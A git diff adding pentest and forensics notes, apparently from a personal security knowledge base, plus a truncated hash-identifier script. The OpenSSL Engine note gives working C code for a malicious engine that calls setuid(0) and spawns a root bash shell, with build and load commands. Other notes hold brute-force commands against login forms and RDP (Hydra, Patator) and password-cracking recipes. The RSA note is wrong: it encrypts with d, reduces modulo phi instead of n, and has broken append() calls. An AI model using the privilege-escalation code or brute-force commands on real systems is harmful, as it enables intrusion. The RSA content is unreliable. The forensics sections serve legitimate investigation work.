diff --git a/Cryptography/OpenSSL Engine.md b/Cryptography/OpenSSL Engine.md new file mode 100644 index 0000000..98363d9 --- /dev/null +++ b/Cryptography/OpenSSL Engine.md @@ -0,0 +1,44 @@ +# OpenSSL Engine + +* Hook external libs +* [OpenSSL blog](https://www.openssl.org/blog/blog/2015/10/08/engine-building-lesson-1-a-minimum-useless-engine/) + +* Most minimal example +```C +#include + +static int bind(ENGINE *e, const char *id) +{ + return 1; +} + +IMPLEMENT_DYNAMIC_BIND_FN(bind) +IMPLEMENT_DYNAMIC_CHECK_FN() +``` + +* Shell as root +```C +#include +#include + +static int bind(ENGINE *e, const char *id) +{ + setuid(0); + setgid(0); + system("/bin/bash"); +} + +IMPLEMENT_DYNAMIC_BIND_FN(bind) +IMPLEMENT_DYNAMIC_CHECK_FN() +``` + +* Compile +```C +gcc -fPIC -o rootshell.o -c rootshell.c +gcc -shared -o rootshell.so -c -lcrytpo rootshell.o +``` + +* Execute via +```sh +openssl engine -t `pwd`/rootshell.so +``` diff --git a/Cryptography/OpenSSL-Cheatsheet.md b/Cryptography/OpenSSL-Cheatsheet.md new file mode 100644 index 0000000..964d99b --- /dev/null +++ b/Cryptography/OpenSSL-Cheatsheet.md @@ -0,0 +1,23 @@ +# OpenSSL Cheatsheet + +## Extract keys from PFX Cert + +* Key and cert form PFX +```sh +openssl pkcs12 -in cert.pfx -nocerts -out key.pem -nodes +openssl pkcs12 -in cert.pfx -out cert.pem -clcerts -nokeys +``` + +## Extract & Repack PFX Cert + +* Extract & Repack with another password, e.g. from `mimikatz` to `cqure` +```sh +openssl pkcs12 -in *.pfx -out temp.pem -nodes +openssl pkcs12 -export -out *.pfx -in temp.pem +``` + +## Generate Certificate + +```sh +openssl req -new -x509 -keyout cert.pem -out cert.pem -days 365 -nodes +``` diff --git a/Cryptography/RSA.md b/Cryptography/RSA.md new file mode 100644 index 0000000..66c4f5d --- /dev/null +++ b/Cryptography/RSA.md @@ -0,0 +1,36 @@ +# RSA + +* `p * q = n` +* Coprime Phi is calculated either by [Euler Totient](https://en.wikipedia.org/wiki/Euler's_totient_function) or [greatest common divisor](https://en.wikipedia.org/wiki/Greatest_common_divisor) via [euclidean algorithm](https://crypto.stanford.edu/pbc/notes/numbertheory/euclid.html) +* \\(1 < $\phi$ < n \\) +* There is also $\phi$ = (p-1) * (q-1) + +* Encryption, public key `e` is a prime between 2 and phi --> \\( 2 < e < $\phi$ \\) +```python +possible_e = [] +for i in range (2, phi): + if gcd(n, i) == 1 and gcd(phi, i) == 1: + possible_e.append() +``` + +* Decryption, private key `d` --> \\( d * e mod $\phi$ = 1 \\) +```python +possible_d = [] +for i in range (phi + 1, phi + foo): + if i * e mod phi == 1 : + possible_d.append() +``` +* \\( Cipher = msg ** d mod $\phi$ \\) +* \\( Cleartext = cipher ** e mod $\phi$ ) + +## Euklid +```python +def gcd(a, b): + if b == 0: + return a + return gcd(b, a % b) +``` + +## Links + +* [Encryption+Decryption](https://www.cs.drexel.edu/~jpopyack/Courses/CSP/Fa17/notes/10.1_Cryptography/RSA_Express_EncryptDecrypt_v2.html) diff --git a/Forensics/Kape.md b/Forensics/Kape.md new file mode 100644 index 0000000..d79bf8c --- /dev/null +++ b/Forensics/Kape.md @@ -0,0 +1,23 @@ +# Kroll Artifact Parser + +* Collect and processes artifacts on windows +* Collects from live systems, mounted images and F-response tool + +## Targets + +* Needs source and target directory, as well as a module to process the files on +* `Target` copies a file into a repository +* `*.tkape` files contains metadata of the files to copy +* `Compound Targets` contain metadata of multiple files in order to get a result quicker +* `!Disable` do not appear in the target list +* `!Local` keep on local + + +## Modules + +* Used on the targeted files +* `*.mkape` files +* Additional binaries are kept in `bin` + + + diff --git a/Forensics/NTFS.md b/Forensics/NTFS.md new file mode 100644 index 0000000..6ef15ce --- /dev/null +++ b/Forensics/NTFS.md @@ -0,0 +1,48 @@ +# NTFS + +* Has the following advantages over FAT + * Journaling + * ACL + * Volume Shadow Copy + * Alternate Data Stream + +## Master File Table +* VBR references to `$MFT` +* `$LOGFILE` stores transactions of the file system +* `$UsnJrnl` changed files, and reason for change + +## Caching + +* File information is cached for frequent use in +```sh +C:\Windows\Prefetch\*.pf +``` +* An SQLite database can be found under +```sh +C:\Users\\AppData\Local\ConnectedDevicesPlatform\{randomfolder}\ActivitiesCache.db +``` + +## Jumplist + +* Stores recently used files of applications inside the taskbar +```sh +C:\Users\\AppData\Roaming\Microsoft\Windows\Recent\AutomaticDestinations +``` + +## Shortcut Files +```sh +C:\Users\\AppData\Roaming\Microsoft\Windows\Recent\ +C:\Users\\AppData\Roaming\Microsoft\Office\Recent\ +``` + +## Internet Explorer History +```sh +C:\Users\\AppData\Local\Microsoft\Windows\WebCache\WebCacheV*.dat +``` + +## Removeable Device Setup Log +```sh +C:\Windows\inf\setupapi.dev.log +``` + + diff --git a/Forensics/OLEtools.md b/Forensics/OLEtools.md new file mode 100644 index 0000000..251843e --- /dev/null +++ b/Forensics/OLEtools.md @@ -0,0 +1,28 @@ +# oletools & Vmonkey + +* Analyze ooxml and ole2 files + +* [oletools repo](https://github.com/decalage2/oletools.git) + +## Usage + +* Check content of a stream +```sh +oledump.py file.doc -Ss +oledump.py file.doc -Ss -v +``` +```sh +oledump.py -i file.doc +``` +```sh +olevba file.doc +``` + +## Vipermonkey +* For the lazy ones +```sh +vmonkey file.doc +``` + +## scdbg +* [scdbg repo](https://github.com/dzzie/SCDBG.git) diff --git a/Forensics/References.md b/Forensics/References.md new file mode 100644 index 0000000..ec7930a --- /dev/null +++ b/Forensics/References.md @@ -0,0 +1,7 @@ +## Forensics References + +## Volatility + +[volatility](https://github.com/volatilityfoundation/volatility.git) +[volatility3](https://github.com/volatilityfoundation/volatility3.git) + diff --git a/Forensics/Volatility.md b/Forensics/Volatility.md new file mode 100644 index 0000000..3809f95 --- /dev/null +++ b/Forensics/Volatility.md @@ -0,0 +1,91 @@ +# Volatility + +Search through collected volatile memory dumps, volume and VM images. +Volatility and Volatility 3 have a different syntax. The older one has +higher malware hunting abilities. + +* [Cheat sheet](https://downloads.volatilityfoundation.org/releases/2.4/CheatSheet_v2.4.pdf) +* [Hacktricks shee](https://book.hacktricks.xyz/forensics/volatility-examples) +* [Symbol table for Linux and macOS](https://github.com/volatilityfoundation/volatility3#symbol-tables) + +## Basic Commands + +* Basic Info, find OS profile +```sh +volatility -f imageinfo +volatility -f kdbgscan +``` +* Process list +```sh +volatility -f --profile pslist +``` +* List dlls +```sh +volatility -f --profile dlllist -p +``` +* Last accessed dir +```sh +volatility -f --profile shellbags +``` + +### Volatility3 + +* Basic Info works too, but you have to know the kind of OS anyway +```sh +volatility -f windows.info +``` + +* Process list, but processes can be hidden. Therefore use ` psscan ` +```sh +volatility -f windows.pslist +volatility -f windows.psscan +volatility -f windows.pstree +``` + +* List dlls, this includes the path of the file +```sh +volatility -f windows.dlllist +``` + +* Find malicious files, fileless and including files, respectively +```sh +volatility -f windows.malfind +volatility -f windows.vadyarascan +``` + +* Dump memory map +```sh +volatility -f windows.memmap.Memmap --pid --dump +``` + +* Dump and scan files +```sh +windows.dumpfiles.DumpFiles Dumps cached file contents from Windows memory +windows.filescan.FileScan Scans for file objects present in a particular windows. Lists version information from PE files. +``` + +* Find file handles or mutex +```sh +volatility -f windows.mutex +``` + +* Malware hunting through hooking +```sh +windows.ssdt.SSDT Lists the system call table. # System Service Descriptor Table +windows.driverirp.DriverIrp List IRPs for drivers in a particular windows memory image. +windows.modules.Modules Lists the loaded kernel modules. +windows.driverscan.DriverScan Scans for drivers present in a particular windows +``` + + +## Plugins + +Volatility 3 plugins are named after the specific profile they are used for. +For the most part these are (` macOS.*, windows.*, linux.* `) + +* For example + * Truecryptpassphrase + * cmdscan, command history + * shutdowntime + + diff --git a/Forensics/Windows Registration.md b/Forensics/Windows Registration.md new file mode 100644 index 0000000..7e141f7 --- /dev/null +++ b/Forensics/Windows Registration.md @@ -0,0 +1,119 @@ +# Windows Registry + +## Regedit Keys +* HKEY_CURRENT_USER (HKCU), inside HKU +* HKEY_USERS (HKU) +* HKEY_LOCAL_MACHINE (HKLM) +* HKEY_CLASSES_ROOT (HKCR), stored in HKLM and HKU + * `HKEY_CURREN_USER\Software\Classes` for settings of interactive user + * `HKEY_LOCAL_MACHINE\Software\Classes` to change default settings +* HKEY_CURRENT_CONFIG + +## Paths +* `C:\Windows\System32\Config` + * Default -> `HKEY_USERS\DEFAULT` + * SAM -> `HKEY_LOCAL_MACHINE\SAM` + * SECURITY -> `HKEY_LOCAL_MACHINE\Security` + * SOFTWARE -> `HKEY_LOCAL_MACHINE\Software` + * SYSTEM -> `HKEY_LOCAL_MACHINE\System` + +* `C:\Users\\` + * NTUSER.DAT -> `HKEY_CURRENT_USER` , hidden file +* `C:\Users\\AppData\Local\Microsoft\Windows` + * USRCLASS.DAT -> `HKEY_CURRENT_USER\Sofware\CLASSES`, hidden file + +* `C:\Windows\AppCompat\Programs\Amcache.hve` + +### Transaction Logs +* Transaction `.LOG` of the registry hive +* Saved inside the same directory which is `C:\Windows\System32\Config`, as the hive which was altered. + +### Backups +* Saved every ten days +* Look out for recently deleted or modified keys +* `C:\Windows\System32\Config\RegBack` + +## Data Acquisition +* Tools + * [Autopsy](https://www.autopsy.com/) + * [FTK Imager](https://www.exterro.com/ftk-imager), does not copy `Amcache.hve` + * [KAPE](https://www.kroll.com/en/services/cyber-risk/incident-response-litigation-support/kroll-artifact-parser-extractor-kape), preserves directory tree + * `Registry Viewer` + * `Zimmerman's Registry Explorer`, uses transaction logs as well + * ` AppCompatCache Parser` + * `RegRipper`, cli and gui + +## System Information +* OS Version -> `SOFTWARE\Microsoft\Windows NT\CurrentVersion` +* Computer Name -> `SYSTEM\CurrentControlSet\Control\ComputerName\ComputerName` +* Time Zone `SYSTEM\CurrentControlSet\Control\TimeZoneInformation` +* Network Interfaces -> `SYSTEM\CurrentControlSet\Services\Tcpip\Parameters\Interfaces` +* Past connected networks -> `SOFTWARE\Microsoft\Windows NT\CurrentVersion\NetworkList\Signatures\Unmanaged` and `SOFTWARE\Microsoft\Windows NT\CurrentVersion\NetworkList\Signatures\Managed` +* Services -> `SYSTEM\CurrentControlSet\Services` + * Service will start at boot with `start` key value `0x02` +* Users, SAM -> `SAM\Domains\Account\Users` + + +### Control Sets +* `ControlSet001` -> last boot +* `ControlSet002` -> last known good +* `HKLM\SYSTEM\CurrentControlSet` -> live + +* Can be found under: + * `SYSTEM\Select\Current` shows the used control set + * `SYSTEM\Select\LastKnownGood` + +## Autostart Programs +* `NTUSER.DAT\Software\Microsoft\Windows\CurrentVersion\Run` +* `NTUSER.DAT\Software\Microsoft\Windows\CurrentVersion\RunOnce` +* `SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce` +* `SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer\Run` +* `SOFTWARE\Microsoft\Windows\CurrentVersion\Run` + +## Recent Files +* `NTUSER.DAT\Software\Microsoft\Windows\CurrentVersion\Explorer\RecentDocs`, e.g. xml, pdf, jpg +* Office files -> `NTUSER.DAT\Software\Microsoft\Office\VERSION`, `NTUSER.DAT\Software\Microsoft\Office\15.0\Word` +* Office 365 -> `NTUSER.DAT\Software\Microsoft\Office\VERSION\UserMRU\LiveID_####\FileMRU` + +## ShellBags +* `USRCLASS.DAT\Local Settings\Software\Microsoft\Windows\Shell\Bags` +* `USRCLASS.DAT\Local Settings\Software\Microsoft\Windows\Shell\BagMRU` +* `NTUSER.DAT\Software\Microsoft\Windows\Shell\BagMRU` +* `NTUSER.DAT\Software\Microsoft\Windows\Shell\Bags` + +## Last Open/Saved/Visited Dialog MRUs +* `NTUSER.DAT\Software\Microsoft\Windows\CurrentVersion\Explorer\ComDlg32\OpenSavePIDlMRU` +* `NTUSER.DAT\Software\Microsoft\Windows\CurrentVersion\Explorer\ComDlg32\LastVisitedPidlMRU` + +## Explorer Address/Search Bars +* `NTUSER.DAT\Software\Microsoft\Windows\CurrentVersion\Explorer\TypedPaths` +* `NTUSER.DAT\Software\Microsoft\Windows\CurrentVersion\Explorer\WordWheelQuery` + +## User Assist +* GUI applications launched by the user +* `NTUSER.DAT\Software\Microsoft\Windows\Currentversion\Explorer\UserAssist\{GUID}\Count` + +## Shim Cache +* Application Compatibility, AppCompatCache +* `SYSTEM\CurrentControlSet\Control\Session Manager\AppCompatCache` +* Use `AppCompatCacheParser.exe --csv -f -c ` + +### AmCache +* Information about recently run applications on the system +* `C:\Windows\appcompat\Programs\Amcache.hve` +* Last executed app -> `Amcache.hve\Root\File\{Volume GUID}\` +* Saves SHA1 of the last executed app + +## Background Activity Monitor/Desktop Activity Moderator BAM/DAM +* Saves full path of executed apps +* `SYSTEM\CurrentControlSet\Services\bam\UserSettings\{SID}` +* `SYSTEM\CurrentControlSet\Services\dam\UserSettings\{SID}` + +## Devices +* Identification + * USB -> `SYSTEM\CurrentControlSet\Enum\USBTOR`, `SYSTEM\CurrentControlSet\Enum\USB` +* Device name -> `SOFTWARE\Microsoft\Windows Portable Devices\Devices` +* First time connected -> `SYSTEM\CurrentControlSet\Enum\USBSTOR\Ven_Prod_Version\USBSerial#\Properties\{83da6326-97a6-4088-9453-a19231573b29}\0064` +* Last time connected -> `SYSTEM\CurrentControlSet\Enum\USBSTOR\Ven_Prod_Version\USBSerial#\Properties\{83da6326-97a6-4088-9453-a19231573b29}\0066` +* Last removal time -> `SYSTEM\CurrentControlSet\Enum\USBSTOR\Ven_Prod_Version\USBSerial#\Properties\{83da6326-97a6-4088-9453-a19231573b29}\0067` + diff --git a/Forensics/iOS.md b/Forensics/iOS.md new file mode 100644 index 0000000..642ba92 --- /dev/null +++ b/Forensics/iOS.md @@ -0,0 +1,32 @@ +# iOS Devices + +## Trust Certificates +* Exchanged between 'Trusted' devices and the charging iOS device. +* iTunes access to the iOS device has elevated permissions using the cert. +* Keychain may be extracted through iTunes. + +## Interesting Files +* `ResetCounter.plist`, hard Reset diagnostic counter +* `com.apple.preferences.datetime.plist` +* DB tables + * Atendee + * Task + * Event +* Mail +* Safari +* Cookies +* Pictures +* Addressbook +* SMS +* Voicemail +* WiFi Keys + +## Backups +Encrypted and unencrypted backups can be chosen in the iTunes menu. + + +## Tools +* [iFunbox](https://www.i-funbox.com/en/page-about-us.html) +* [O.MG cable](https://shop.hak5.org/products/o-mg-cable) + + diff --git a/Hashes/Bruteforce/Patator.md b/Hashes/Bruteforce/Patator.md new file mode 100644 index 0000000..ad1a363 --- /dev/null +++ b/Hashes/Bruteforce/Patator.md @@ -0,0 +1,23 @@ +# Patator Bruteforcing + +* [Lanjelot's Repo](https://github.com/lanjelot/patator/) + +## Modules + +* Available modules can be found under `patator --help` +* Module specifics can be found via `patator -h` + +## Using a Module + +* For example `http_fuzz` can be used via +```sh +TARGET_IP=10.0.47.11 +CSRF=$(curl -s -c stored.cookie "${IP}/login.php" | awk -F 'value=' '/user_token/ {print $2}' | cut -d "'" -f2) +SESSION_ID=$(grep PHPSESSID stored.cookie | awk -F ' ' '{print $7}') + +echo "The CSRF is: $CSRF" +echo "The PHPSESSID is: $SESSION_ID" + +patator.py http_fuzz method=POST --threads=64 timeout=10 url="http://${TARGET_IP}/login.php" 0=passwords.txt body="username=admin&password=FILE0&Login=Login&user_token=${CSRF}" header="Cookie: PHPSESSID=${SESSION_ID}; security=impossible" -x quit:fgrep!=login.php -x ignore:fgrep='Location: login.php' -x +``` + diff --git a/Hashes/Haiti.md b/Hashes/Haiti.md new file mode 100644 index 0000000..5af9a7d --- /dev/null +++ b/Hashes/Haiti.md @@ -0,0 +1,6 @@ +# haiti + +* Hash Identifier +```sh +haiti +``` diff --git a/Hashes/Hashcat.md b/Hashes/Hashcat.md new file mode 100644 index 0000000..948a63c --- /dev/null +++ b/Hashes/Hashcat.md @@ -0,0 +1,24 @@ +# Hashcat Utilities + +* [Modes](https://hashcat.net/wiki/doku.php?id=example_hashes) + +## Wordlists + +* Combine wordlists +```sh +combinator wordlist.txt otherwordlist.txt > newwordlist.txt +``` + +* Create wordlist +```sh +hashcat --force -r /opt/hashcat/rules/best64.rule --stdout > wordlist.txt +``` + +## Using Masks + +* A mask can be set instead of a wordlist, this charset is then brute forced by iterating the charset +* [Masks](https://hashcat.net/wiki/doku.php?id=mask_attack) +* Bruteforcing seven lowerspace characters using `SHA2-384` as an example +```sh +hashcat -m 10800 -a 3 hash.out ?l?l?l?l?l?l?l +``` diff --git a/Hashes/Password Cracking/Hydra.md b/Hashes/Password Cracking/Hydra.md new file mode 100644 index 0000000..1902f78 --- /dev/null +++ b/Hashes/Password Cracking/Hydra.md @@ -0,0 +1,37 @@ +# Hydra usage + +## Examples + +* HTTP post form +```sh +hydra -l -P MACHINE_IP http-post-form "/:username=^USER^&password=^PASS^:F=incorrect" -V +``` +* HTTP basic auth +```sh +hydra -l bob -P /usr/share/seclists/Passwords/Leaked-Databases/rockyou.txt -f 10.10.167.239 http-get /protected +``` + + +|Command|Description| +|-------|-----------| +|`hydra -P -v `|Brute force against a protocol of your choice| +|`hydra -v -V -u -L -P -t 1 -u `|You can use Hydra to bruteforce usernames as well as passwords. It will loop through every combination in your lists. (-vV = verbose mode, showing login attempts)| +|`hydra -t 1 -V -f -l -P rdp://`|Attack a Windows Remote Desktop with a password list.| +|`hydra -l -P . $ip -V http-form-post '/wp-login.php:log=^USER^&pwd=^PASS^&wp-submit=Log In&testcookie=1:S=Location'`|Craft a more specific request for Hydra to brute force.| + +## Parameter + +|Option|Decription| +|------|----------| +|-l|Single username| +|-P|Indicates use the following wordlist| +|http-post-form|indicates the method| +|/login url|the login URL| +|:username|the form field where the username is entered| +|^USER^|tells Hydra to use the username from -l| +|password|the formfield where the password is entered| +|^PASS^|tells Hydra to use the wordlist from -P| +|Login|indicates to Hydra the login failed message| +|Login failed|is the login failure message that the form returns| +|F=incorrect|If this word appears on the page, login failed| +|-V| verbose| diff --git a/Hashes/Password Cracking/John the Ripper.md b/Hashes/Password Cracking/John the Ripper.md new file mode 100644 index 0000000..3a51428 --- /dev/null +++ b/Hashes/Password Cracking/John the Ripper.md @@ -0,0 +1,43 @@ +# John The Ripper + +* [Formats](http://pentestmonkey.net/cheat-sheet/john-the-ripper-hash-formats) + +# Usage + +* Example +```sh +john --wordlist=/usr/share/seclists/Passwords/Leaked-Databases/rockyou.txt ./hash.txt --format=raw-sha256 --fork=2 +``` + +## Declaring Structure +* List subformat +```sh +john --list=subformats +``` +```sh +john --wordlist=/usr/share/seclists/Passwords/Leaked-Databases/rockyou.txt ./hash.txt --format=dynamic_85 --fork=2 +``` + +## Rules +* [Rule syntax](https://www.openwall.com/john/doc/RULES.shtml) +* Create a local rules file, e.g. `/etc/john-local.conf` or `/usr/share/john/john-local.conf` +* Create config for mutations, e.g. border mutation +```sh +[List.Rules:border] +$[0-9]$[0-9] +``` +* Run john with parameter `--rules=border` + +### Existing Rules +* `l33t`, l33tsp34k +* `NT`, case mutation +* Example for `best64` +```sh +john --wordlist=single_password.txt --rules=best64 --stdout > out.txt +``` + +### Subformats +* Some salted passwords need dynamic rules +```sh +john --list=subformats +``` diff --git a/Hashes/Password Cracking/VNC.md b/Hashes/Password Cracking/VNC.md new file mode 100644 index 0000000..9903c26 --- /dev/null +++ b/Hashes/Password Cracking/VNC.md @@ -0,0 +1,6 @@ +# VNC Password Decoding + +* Found passwords in vnc config files may be decoded via +```sh + echo -n "" | xxd -r -p | openssl enc -des-cbc --nopad --nosalt -K 5AB2CDC0BADCAF13F1 -iv 0000000000000000 -d | hexdump -Cv +``` diff --git a/Hashes/Password Cracking/sucrack.md b/Hashes/Password Cracking/sucrack.md new file mode 100644 index 0000000..132fba8 --- /dev/null +++ b/Hashes/Password Cracking/sucrack.md @@ -0,0 +1,8 @@ +# sucrack + +* [Repo](https://github.com/hemp3l/sucrack.git) +* Upload to target and build +```sh +sucrack -u -w 100 +``` + diff --git a/Hashes/References.md b/Hashes/References.md new file mode 100644 index 0000000..c13d68f --- /dev/null +++ b/Hashes/References.md @@ -0,0 +1,19 @@ +# Hashes References + +## Password and Username Generation + +[exrex](https://github.com/asciimoo/exrex.git) +[namely](https://github.com/OrielOrielOriel/namely.git) + +## Password Cracking + +[Colabcat](https://github.com/someshkar/colabcat.git) + +## Default Passwords + +[default-password](https://default-password.info) +[datarecovery](https://datarecovery.com/rd/default-passwords/) + +## Wordlist Manager + +[wordlistctl](https://github.com/BlackArch/wordlistctl.git) diff --git a/Hashes/Scripts/hash-id.py b/Hashes/Scripts/hash-id.py new file mode 100644 index 0000000..6efb601 --- /dev/null +++ b/Hashes/Scripts/hash-id.py @@ -0,0 +1,592 @@ +#!/usr/bin/env python +# encoding: utf-8 +# Hash Identifier +# By Zion3R +# www.Blackploit.com +# Root@Blackploit.com + +from builtins import input +from sys import argv, exit + +version = 1.2 + +logo=''' ######################################################################### + # __ __ __ ______ _____ # + # /\ \/\ \ /\ \ /\__ _\ /\ _ `\ # + # \ \ \_\ \ __ ____ \ \ \___ \/_/\ \/ \ \ \/\ \ # + # \ \ _ \ /'__`\ / ,__\ \ \ _ `\ \ \ \ \ \ \ \ \ # + # \ \ \ \ \/\ \_\ \_/\__, `\ \ \ \ \ \ \_\ \__ \ \ \_\ \ # + # \ \_\ \_\ \___ \_\/\____/ \ \_\ \_\ /\_____\ \ \____/ # + # \/_/\/_/\/__/\/_/\/___/ \/_/\/_/ \/_____/ \/___/ v'''+str(version)+''' # + # By Zion3R # + # www.Blackploit.com # + # Root@Blackploit.com # + #########################################################################''' + +algorithms={"102020":"ADLER-32", "102040":"CRC-32", "102060":"CRC-32B", "101020":"CRC-16", "101040":"CRC-16-CCITT", "104020":"DES(Unix)", "101060":"FCS-16", "103040":"GHash-32-3", "103020":"GHash-32-5", "115060":"GOST R 34.11-94", "109100":"Haval-160", "109200":"Haval-160(HMAC)", "110040":"Haval-192", "110080":"Haval-192(HMAC)", "114040":"Haval-224", "114080":"Haval-224(HMAC)", "115040":"Haval-256", "115140":"Haval-256(HMAC)", "107080":"Lineage II C4", "106025":"Domain Cached Credentials - MD4(MD4(($pass)).(strtolower($username)))", "102080":"XOR-32", "105060":"MD5(Half)", "105040":"MD5(Middle)", "105020":"MySQL", "107040":"MD5(phpBB3)", "107060":"MD5(Unix)", "107020":"MD5(Wordpress)", "108020":"MD5(APR)", "106160":"Haval-128", "106165":"Haval-128(HMAC)", "106060":"MD2", "106120":"MD2(HMAC)", "106040":"MD4", "106100":"MD4(HMAC)", "106020":"MD5", "106080":"MD5(HMAC)", "106140":"MD5(HMAC(Wordpress))", "106029":"NTLM", "106027":"RAdmin v2.x", "106180":"RipeMD-128", "106185":"RipeMD-128(HMAC)", "106200":"SNEFRU-128", "106205":"SNEFRU-128(HMAC)", "106220":"Tiger-128", "106225":"Tiger-128(HMAC)", "106240":"md5($pass.$salt)", "106260":"md5($salt.'-'.md5($pass))", "106280":"md5($salt.$pass)", "106300":"md5($salt.$pass.$salt)", "106320":"md5($salt.$pass.$username)", "106340":"md5($salt.md5($pass))", "106360":"md5($salt.md5($pass).$salt)", "106380":"md5($salt.md5($pass.$salt))", "106400":"md5($salt.md5($salt.$pass))", "106420":"md5($salt.md5(md5($pass).$salt))", "106440":"md5($username.0.$pass)", "106460":"md5($username.LF.$pass)", "106480":"md5($username.md5($pass).$salt)", "106500":"md5(md5($pass))", "106520":"md5(md5($pass).$salt)", "106540":"md5(md5($pass).md5($salt))", "106560":"md5(md5($salt).$pass)", "106580":"md5(md5($salt).md5($pass))", "106600":"md5(md5($username.$pass).$salt)", "106620":"md5(md5(md5($pass)))", "106640":"md5(md5(md5(md5($pass))))", "106660":"md5(md5(md5(md5(md5($pass)))))", "106680":"md5(sha1($pass))", "106700":"md5(sha1(md5($pass)))", "106720":"md5(sha1(md5(sha1($pass))))", "106740":"md5(strtoupper(md5($pass)))", "109040":"MySQL5 - SHA-1(SHA-1($pass))", "109060":"MySQL 160bit - SHA-1(SHA-1($pass))", "109180":"RipeMD-160(HMAC)", "109120":"RipeMD-160", "109020":"SHA-1", "109140":"SHA-1(HMAC)", "109220":"SHA-1(MaNGOS)", "109240":"SHA-1(MaNGOS2)", "109080":"Tiger-160", "109160":"Tiger-160(HMAC)", "109260":"sha1($pass.$salt)", "109280":"sha1($salt.$pass)", "109300":"sha1($salt.md5($pass))", "109320":"sha1($salt.md5($pass).$salt)", "109340":"sha1($salt.sha1($pass))", "109360":"sha1($salt.sha1($salt.sha1($pass)))", "109380":"sha1($username.$pass)", "109400":"sha1($username.$pass.$salt)", "1094202":"sha1(md5($pass))", "109440":"sha1(md5($pass).$salt)", "109460":"sha1(md5(sha1($pass)))", "109480":"sha1(sha1($pass))", "109500":"sha1(sha1($pass).$salt)", "109520":"sha1(sha1($pass).substr($pass,0,3))", "109540":"sha1(sha1($salt.$pass))", "109560":"sha1(sha1(sha1($pass)))", "109580":"sha1(strtolower($username).$pass)", "110020":"Tiger-192", "110060":"Tiger-192(HMAC)", "112020":"md5($pass.$salt) - Joomla", "113020":"SHA-1(Django)", "114020":"SHA-224", "114060":"SHA-224(HMAC)", "115080":"RipeMD-256", "115160":"RipeMD-256(HMAC)", "115100":"SNEFRU-256", "115180":"SNEFRU-256(HMAC)", "115200":"SHA-256(md5($pass))", "115220":"SHA-256(sha1($pass))", "115020":"SHA-256", "115120":"SHA-256(HMAC)", "116020":"md5($pass.$salt) - Joomla", "116040":"SAM - (LM_hash:NT_hash)", "117020":"SHA-256(Django)", "118020":"RipeMD-320", "118040":"RipeMD-320(HMAC)", "119020":"SHA-384", "119040":"SHA-384(HMAC)", "120020":"SHA-256", "121020":"SHA-384(Django)", "122020":"SHA-512", "122060":"SHA-512(HMAC)", "122040":"Whirlpool", "122080":"Whirlpool(HMAC)"} + +# hash.islower() minusculas +# hash.isdigit() numerico +# hash.isalpha() letras +# hash.isalnum() alfanumerico + +def CRC16(hash): + hs='4607' + if len(hash)==len(hs) and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("101020") +def CRC16CCITT(hash): + hs='3d08' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("101040") +def FCS16(hash): + hs='0e5b' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("101060") + +def CRC32(hash): + hs='b33fd057' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("102040") +def ADLER32(hash): + hs='0607cb42' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("102020") +def CRC32B(hash): + hs='b764a0d9' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("102060") +def XOR32(hash): + hs='0000003f' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("102080") + +def GHash323(hash): + hs='80000000' + if len(hash)==len(hs) and hash.isdigit()==True and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("103040") +def GHash325(hash): + hs='85318985' + if len(hash)==len(hs) and hash.isdigit()==True and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("103020") + +def DESUnix(hash): + hs='ZiY8YtDKXJwYQ' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False: + jerar.append("104020") + +def MD5Half(hash): + hs='ae11fd697ec92c7c' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("105060") +def MD5Middle(hash): + hs='7ec92c7c98de3fac' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("105040") +def MySQL(hash): + hs='63cea4673fd25f46' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("105020") + +def DomainCachedCredentials(hash): + hs='f42005ec1afe77967cbc83dce1b4d714' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106025") +def Haval128(hash): + hs='d6e3ec49aa0f138a619f27609022df10' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106160") +def Haval128HMAC(hash): + hs='3ce8b0ffd75bc240fc7d967729cd6637' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106165") +def MD2(hash): + hs='08bbef4754d98806c373f2cd7d9a43c4' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106060") +def MD2HMAC(hash): + hs='4b61b72ead2b0eb0fa3b8a56556a6dca' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106120") +def MD4(hash): + hs='a2acde400e61410e79dacbdfc3413151' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106040") +def MD4HMAC(hash): + hs='6be20b66f2211fe937294c1c95d1cd4f' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106100") +def MD5(hash): + hs='ae11fd697ec92c7c98de3fac23aba525' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106020") +def MD5HMAC(hash): + hs='d57e43d2c7e397bf788f66541d6fdef9' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106080") +def MD5HMACWordpress(hash): + hs='3f47886719268dfa83468630948228f6' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and 